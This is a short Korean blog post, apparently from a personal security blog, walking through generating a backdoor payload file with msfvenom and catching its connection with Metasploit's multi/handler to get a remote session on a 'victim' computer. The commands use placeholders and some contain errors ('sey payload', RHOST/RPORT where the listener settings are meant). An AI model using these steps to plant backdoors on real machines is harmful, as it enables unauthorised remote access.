관리 메뉴

Lucete

msfvenom 본문

Metasploit

msfvenom

LuCeT3 2015.12.06 23:24

주의! 모든 악의적인 법적 책임은 사용자에게 있습니다.


흠... 옛날에는 msfpayload 라는 명령어를 사용하여 백도어도 만들어 보고 했다.

그러나 바끼고 난 후 오랜만에 써야해서 명령어를 하니 msfpayload가 없데여,,,

검색결과 msfvenom 으로 바꼈길래 다시 공부를 하였다.


이제 이를 간단히 사용해보자!

먼저 리스트를 보기위해


1. msfvenom -l




이렇게 리스트가 나온다.


만약 자기가 쓰고 싶은 payload를 찾았다면 


2. msfvenom -p 원하는 payload -f 확장자 > 파일이름.확장자





root 폴더에 가면 파일이 생성되어있다.


이젠 핸들러를 향해!!


1. msfconsole


2. use exploit/multi/handler



3. sey payload [payload 명]




4. set RHOST [payload 만들때 넣은 IP] 

5. set RPORT [payload 만들때 넣은 PORT]



6. set ExitOnsession false



7. exploit -j -z 




피해자 컴퓨터에서 프로그램을 실행시키면 



이렇게 뜬다


그후 엔터 


다시  sessions -i 1 을 입력하면




아직 칼리에서 윈도우 10을 인식을 못하는 것 같다.

'Metasploit' 카테고리의 다른 글

stagefright.py  (0) 2016.02.10
postgreSQL?  (0) 2015.12.14
msfvenom  (0) 2015.12.06
msf 이용하기 // beEF 사용법  (0) 2015.12.06
Arp Spoofing & DNS Spoofing  (0) 2015.12.06
msf 이용하기2  (0) 2015.12.02
0 Comments
댓글쓰기 폼